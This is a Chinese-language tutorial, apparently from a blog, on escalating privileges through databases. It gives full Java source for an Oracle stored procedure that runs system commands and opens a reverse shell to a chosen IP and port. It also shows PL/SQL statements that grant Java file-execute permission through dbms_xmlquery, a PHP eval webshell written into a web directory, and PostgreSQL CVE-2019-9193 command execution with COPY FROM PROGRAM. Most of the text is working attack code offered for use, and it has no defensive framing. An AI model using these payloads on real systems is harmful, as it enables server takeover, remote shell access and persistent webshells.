Java函数提权
提权前提
1、用户权限为dba权限
提权过程
第一步:执行以下语句导入Java代码,初始化ShellUtil函数
DECLAREv_command VARCHAR2(32767);BEGIN v_command :='create or replace and compile javasource named "ShellUtil" as import java.io.*;
importjava.net.Socket;
public class ShellUtilextends Object{
public static String run(String methodName,String params, String encoding) {
String res = "";
if(methodName.equals("exec")) {
res = ShellUtil.exec(params,encoding);
}else if (methodName.equals("connectback")){
String ip = params.substring(0,params.indexOf("^"));
String port =params.substring(params.indexOf("^") + 1);
res = ShellUtil.connectBack(ip,Integer.parseInt(port));
}
else {
res = "unkown methodName";
}
return res;
}
public static String exec(String command,String encoding) {
StringBuffer result = newStringBuffer();
try {
BufferedReader myReader = newBufferedReader(newInputStreamReader(Runtime.getRuntime().exec(command).getInputStream(),encoding));
String stemp = "";
while ((stemp =myReader.readLine()) != null) result.append(stemp + "");
myReader.close();
} catch (Exception e) {
result.append(e.toString());
}
return result.toString();
}
public static String connectBack(String ip,int port) {
class StreamConnector extends Thread {
InputStream sp;
OutputStream gh;
StreamConnector(InputStream sp,OutputStream gh) {
this.sp = sp;
this.gh = gh;
}
@Override
public void run() {
BufferedReader xp = null;
BufferedWriter ydg = null;
try {
xp = new BufferedReader(newInputStreamReader(this.sp));
ydg = newBufferedWriter(new OutputStreamWriter(this.gh));
char buffer[] = newchar[8192];
int length;
while ((length = xp.read(buffer, 0,buffer.length)) > 0) {
ydg.write(buffer, 0,length);
ydg.flush();
}
} catch (Exception e) {}
try {
if (xp != null) {
xp.close();
}
if (ydg != null) {
ydg.close();
}
} catch (Exception e) {
}
}
}
try {
String sp;
if(System.getProperty("os.name").toLowerCase().indexOf("windows")== -1) {
sp = newString("/bin/sh");
} else {
sp = newString("cmd.exe");
}
Socket sk = new Socket(ip, port);
Process ps =Runtime.getRuntime().exec(sp);
(newStreamConnector(ps.getInputStream(), sk.getOutputStream())).start();
(new StreamConnector(sk.getInputStream(),ps.getOutputStream())).start();
} catch (Exception e) {
}
return "^OK^";
}
}';EXECUTEIMMEDIATE v_command;END;
第二步:获取Java执行权限
selectdbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin executeimmediate ''begin dbms_java.grant_permission( ''''SYSTEM'''',''''SYS:java.io.FilePermission'''', ''''<<ALLFILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
第三步:创建shellrun函数
selectdbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin executeimmediate ''create or replace function ShellRun(p_methodName invarchar2,p_params in varchar2,p_encoding in varchar2) return varchar2 aslanguage java name ''''ShellUtil.run(java.lang.String,java.lang.String,java.lang.String)return String''''; '';commit;end;') from dual;
第四步:利用shellrun函数执行系统命令
selectshellrun('exec','whoami','GB2312') from dual
写文件提权
提权前提
1、权限为最高权限
2、知道web应用物理绝对路径并且该路径可写
提权过程
第一步:执行以下语句创建表
create table test1(t TEXT);
第二步:向该表中插入webshell代码
insert into test1(t) values ('<?php@eval($_POST["test1"]);?>');
第三步:将表内容拷贝到web目录下的某文件
第四步:使用webshell管理工具连接
CVE-2019-9193提权
提权前提
1、PostgreSQL 9.3至11.2
2、用户具有COPY TO/FROM PROGRAM权限
提权过程
第一步:创建表
CREATE TABLE testcmd(t TEXT);
第二步:执行以下语句将执行命令结果写入创建的表中
COPY testcmd FROM PROGRAM 'whoami';
第三步:查询创建的表中数据
SELECT * FROM testcmd;
评论
0 点赞